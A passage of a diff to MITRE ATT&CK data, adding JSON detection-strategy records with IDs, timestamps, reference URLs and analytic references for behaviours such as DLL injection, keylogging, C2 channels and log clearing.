+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0516",
+                            "external_id": "DET0516"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Behavioral Detection of Command and Scripting Interpreter Abuse",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--fee823fd-f31e-4898-820e-322e49574438",
+                        "x-mitre-analytic--3b02d81a-8684-4fc8-8364-127f30359282",
+                        "x-mitre-analytic--4a32d0e6-9486-4bbb-8807-7f913f96f448",
+                        "x-mitre-analytic--533d13df-5317-45dd-a544-c26d0192d6b2",
+                        "x-mitre-analytic--9e03886b-155c-4483-9d92-dad6a7d8543b"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.683000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--e9c54806-2d8e-4722-805c-4a1e7f6a1986",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.696000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0389",
+                            "external_id": "DET0389"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Behavioral Detection of DLL Injection via Windows API",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--a06e9154-5584-4f5d-be47-b420d79674c7"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.696000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--c2721658-fa76-4b6f-9f84-50618de81ae0",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.691000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0400",
+                            "external_id": "DET0400"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Behavioral Detection of DNS Tunneling and Application Layer Abuse",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--407bb9c9-0c31-4172-8dd3-bdd0547f2d1e",
+                        "x-mitre-analytic--cc8183e1-9de4-469a-9117-79bf2e986e31",
+                        "x-mitre-analytic--42a8c7a7-2773-4892-b647-40d3542ae4d2",
+                        "x-mitre-analytic--fe648823-66c8-4cc3-8a8e-38616194464c",
+                        "x-mitre-analytic--11d8dd9d-e8f3-40cd-b9fe-cc82b6c2e790"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.691000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--69f22425-2ebb-4f3c-ab4d-fb9c6645f2f7",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.680000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0360",
+                            "external_id": "DET0360"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Behavioral Detection of Domain Group Discovery",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--2385f397-5d17-4b37-ba07-bb52a52ff66c",
+                        "x-mitre-analytic--3415a6fa-a447-42f3-8155-68cf5d7cbcb3",
+                        "x-mitre-analytic--23fa40ac-79d0-400a-a017-8e06cfc67e6c"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.680000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--c5e3823f-5ee0-43db-b6fa-b63d6587b24c",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.692000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0010",
+                            "external_id": "DET0010"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Behavioral Detection of Event Triggered Execution Across Platforms",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--9418d7e2-666f-4f73-9ac7-96b32005e9b7",
+                        "x-mitre-analytic--92d182e9-6723-43e4-9eab-f00aa6d53153",
+                        "x-mitre-analytic--636b1cca-1fc4-4909-ac33-c2b2a7d69e02",
+                        "x-mitre-analytic--0fb1d87b-e993-447e-8a2f-e9d42f6859c0",
+                        "x-mitre-analytic--982100e1-6d38-4d0e-b36d-7e2d2cf5a424",
+                        "x-mitre-analytic--d8e18081-2670-4a88-9246-59a1dc52c51c"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.692000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--33bbfada-99c8-4cac-8b21-fa013959001d",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.674000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0590",
+                            "external_id": "DET0590"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Behavioral Detection of External Website Defacement across Platforms",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--67febd8b-36fe-4f72-8647-95fe449ecb5d",
+                        "x-mitre-analytic--1affb8e9-25b4-49c1-b290-687e9696fa83",
+                        "x-mitre-analytic--c9b3d194-843a-4f65-ad8b-4b3192571fc5",
+                        "x-mitre-analytic--afd585f3-20fa-4bd8-8930-243cb5dbe5f8"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.674000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--ee1c44c9-c5aa-4a9c-9e68-49854ed4d602",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.697000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0499",
+                            "external_id": "DET0499"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Behavioral Detection of Fallback or Alternate C2 Channels",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--fcb2ed1a-2f39-47e8-9524-95ceac0ff383",
+                        "x-mitre-analytic--a50c90f1-51b1-4948-8945-4b89735d4750",
+                        "x-mitre-analytic--3e682b33-5064-4202-aad7-ca1900fde1a5",
+                        "x-mitre-analytic--5e7eea18-14f5-4d76-b5cc-bc63a0e5ce65"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.697000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--7225a3bd-f235-4c13-a236-3c6b9a3d445c",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.681000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0184",
+                            "external_id": "DET0184"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Behavioral Detection of Indicator Removal Across Platforms",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--4416c78b-902b-4baa-9a5d-26f0b7e5d78d",
+                        "x-mitre-analytic--1fbe9da1-a760-4ac9-8ab0-59203a50fb82",
+                        "x-mitre-analytic--2f0f5c7a-18ee-462e-b364-b1d8df3b2c02",
+                        "x-mitre-analytic--b3d533fc-010a-4ee8-b234-80f98e2443a0",
+                        "x-mitre-analytic--f9b13a61-0110-4882-9384-3468d22ac221",
+                        "x-mitre-analytic--c15d6b5e-bbb7-4dc7-8b59-8ce2c0663c05"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.681000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--c922d994-74bd-4847-a870-c0ae216318c9",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.692000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0102",
+                            "external_id": "DET0102"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Behavioral Detection of Input Capture Across Platforms",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--dd283114-84d8-4b1a-a765-f3a7f378c2d1",
+                        "x-mitre-analytic--79f3bf7a-cf35-442c-b707-ba4dabd6ed62",
+                        "x-mitre-analytic--13f8fd10-3982-4a10-85c1-4641712c7286",
+                        "x-mitre-analytic--6db136be-4e41-4cb7-8237-eee81ee6a3cd"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.692000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--24eeb599-bc8c-4e86-9adf-232153bcb14b",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.672000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0357",
+                            "external_id": "DET0357"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Behavioral Detection of Internet Connection Discovery",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--aa2dc7aa-0cc5-4a75-96b2-8c089c46944b",
+                        "x-mitre-analytic--bdba541c-3a01-4a6d-95ae-15e283f2909b",
+                        "x-mitre-analytic--1443f662-d249-4458-b8fe-2c2da7b64569",
+                        "x-mitre-analytic--ef76221d-d5fe-4285-af27-54711e94e2b5"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.672000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--fe0d7d82-1575-4685-9a4f-4bf83e0227a0",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.698000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0089",
+                            "external_id": "DET0089"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Behavioral Detection of Keylogging Activity Across Platforms",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--7924d1b1-a512-425f-b397-9e9b9887b21b",
+                        "x-mitre-analytic--0c122a8e-bcb0-4756-8a63-193c52d61d90",
+                        "x-mitre-analytic--da140e65-e30c-4cf2-8961-82fb200a7f0b",
+                        "x-mitre-analytic--63a1b615-8389-4776-a79c-6db04037a7b7"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.698000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--de120f6a-c19b-4346-b62f-c8cd95fcb291",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.695000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0114",
+                            "external_id": "DET0114"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Behavioral Detection of Local Group Enumeration Across OS Platforms",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--78f4f0fe-55ef-4598-85ac-865cba1920d3",
+                        "x-mitre-analytic--a62a2b36-00e9-481c-9a3a-14c14cd42dae",
+                        "x-mitre-analytic--66923fbc-1d4d-4945-89dd-102a8e2c6122"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.695000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--20d79eae-0c09-410a-b99a-f8cb6ec9153c",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.672000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0520",
+                            "external_id": "DET0520"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Behavioral Detection of Log File Clearing on Linux and macOS",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--6ffa0db8-a088-4e7a-b8e5-50a204762cca",
+                        "x-mitre-analytic--b4e2440e-8956-4ae6-94cb-da859f407f27"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.672000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--08633541-0006-480a-a2d9-e1c81952cc71",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.668000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0266",
+                            "external_id": "DET0266"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Behavioral Detection of Mailbox Data and Log Deletion for Anti-Forensics",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--ddbf61e2-7dad-40ef-90ef-7bec707b50fd",
+                        "x-mitre-analytic--9933242a-f96e-4b3e-896f-e7335f410a4f",
+                        "x-mitre-analytic--cd10c7fd-edef-4f85-aff3-9eaa35906b18",
+                        "x-mitre-analytic--dff59103-f6d4-4580-8316-a0528768b4b3"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.668000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--e7bd0f37-f2cf-4e3c-a9c1-c41f63b67e1c",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.696000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0078",
+                            "external_id": "DET0078"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Behavioral Detection of Malicious Cloud API Scripting",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--fb933fd5-5dd8-4879-b2bb-e68bc26ff60d"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.696000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--b96fce76-6b29-4e1c-b8b1-741f45a89fdc",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.690000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0140",
+                            "external_id": "DET0140"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Behavioral Detection of Malicious File Deletion",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--b1ee9791-91f8-4788-9e08-c40eedbcf08b",
+                        "x-mitre-analytic--874f0437-1aab-4cfe-a30a-7586c0602b6f",
+                        "x-mitre-analytic--175bf607-fca6-4555-a30b-3d6cd4cfe876",
+                        "x-mitre-analytic--3f53ca22-5efe-43b3-8225-5fdd4b8a8194"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.690000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--408aedab-4a23-41ad-809d-fe9c3805b7f6",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
